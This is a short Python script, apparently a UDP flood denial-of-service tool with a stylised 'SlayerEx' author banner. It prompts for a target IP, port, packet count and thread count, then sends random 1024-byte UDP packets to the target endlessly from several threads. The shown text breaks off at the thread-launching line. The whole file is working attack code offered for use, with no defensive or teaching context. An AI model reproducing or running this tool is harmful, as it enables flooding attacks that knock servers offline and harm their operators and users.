< #!/usr/bin/env python3
#🅂🄻🄰🅈🄴🅁🄴🅇

import random
import socket
import threading
import os
os.system("clear")
print("𝙰𝚞𝚝𝚑𝚘𝚛 : 𝚂𝚕𝚊𝚢𝚎𝚛𝙴𝚡")
print("𝚃𝚎𝚊𝚖 : 𝚂𝚕𝚊𝚢𝚎𝚛𝙴𝚡")
print("𝙷𝚎𝚕𝚙 : 𝙿𝚘𝚜𝚎𝚒𝚍𝚘𝚗")
print("𝙰𝚋𝚞𝚜𝚎 𝙶𝚠 𝙶𝚘𝚛𝚘𝚔 𝙻𝚞🗿")
ip = str(input(" 𝙸𝚙 𝚂𝚎𝚛𝚟𝚎𝚛 : "))
port = int(input(" 𝙿𝚘𝚛𝚝 𝚂𝚎𝚛𝚟𝚎𝚛 : "))
times = int(input(" 𝙿𝚊𝚔𝚎𝚝 : "))
threads = int(input(" 𝚃𝚑𝚛𝚎𝚊𝚍𝚜 :"))

def run():
  data = random._urandom(1024)
  i = random.choice(("[*]","[!]","[#]"))
  while True:
    try:
      s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
      addr = (str(ip),int(port))
      for x in range(times):
        s.sendto(data,addr)
      print(i +"𝚂𝚕𝚊𝚢𝚎𝚛𝙴𝚡 𝙰𝚔𝚊𝚗 𝙼𝚎𝚖𝚋𝚊𝚜𝚖𝚒")
    except:
      print("𝙳𝚘𝚠𝚗 𝙱𝚢 𝚂𝚕𝚊𝚢𝚎𝚛𝙴𝚡")

for y in range(threads):
    th = threading.